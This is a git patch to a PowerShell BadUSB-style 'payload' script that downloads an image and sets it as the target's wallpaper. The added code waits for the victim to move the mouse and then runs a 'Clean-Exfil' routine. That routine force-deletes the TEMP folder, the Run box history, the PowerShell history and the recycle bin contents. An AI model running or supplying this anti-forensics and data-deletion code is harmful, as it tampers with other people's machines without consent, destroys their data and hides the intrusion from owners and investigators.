From 8725311518a5128f6a0f0dbb2bedbe6f4d64abe6 Mon Sep 17 00:00:00 2001
From: I-Am-Jakoby <Michaelryanchitwood@gmail.com>
Date: Wed, 14 Sep 2022 00:15:55 -0500
Subject: [PATCH] Update Wallpaper-URL.ps1

---
 Payloads/Flip-WallPaper-URL/Wallpaper-URL.ps1 | 36 ++++++++++++++++++-
 1 file changed, 35 insertions(+), 1 deletion(-)

diff --git a/Payloads/Flip-WallPaper-URL/Wallpaper-URL.ps1 b/Payloads/Flip-WallPaper-URL/Wallpaper-URL.ps1
index a172e0e..2bd2c81 100644
--- a/Payloads/Flip-WallPaper-URL/Wallpaper-URL.ps1
+++ b/Payloads/Flip-WallPaper-URL/Wallpaper-URL.ps1
@@ -2,7 +2,7 @@ $url = "WALLPAPER URL HERE"
 
 $ext = $url.split(".")[-1]
 
-$wp = "$Env:USERPROFILE\Desktop\---wp.$ext"
+$wp = "$Env:tmp\---wp.$ext"
 
 iwr $url -O $wp
 
@@ -65,5 +65,39 @@ public class Params
     $ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni)
 }
 
+function Target-Comes {
+Add-Type -AssemblyName System.Windows.Forms
+$originalPOS = [System.Windows.Forms.Cursor]::Position.X
+$o=New-Object -ComObject WScript.Shell
 
+    while (1) {
+        $pauseTime = 3
+        if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
+            break
+        }
+        else {
+            $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
+        }
+    }
+}
+
+function Clean-Exfil { 
+
+# empty temp folder
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# delete run box history
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Empty recycle bin
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
+
+}
+
+
+Target-Comes
 Set-WallPaper -Image $wp -Style Fill
+Clean-Exfil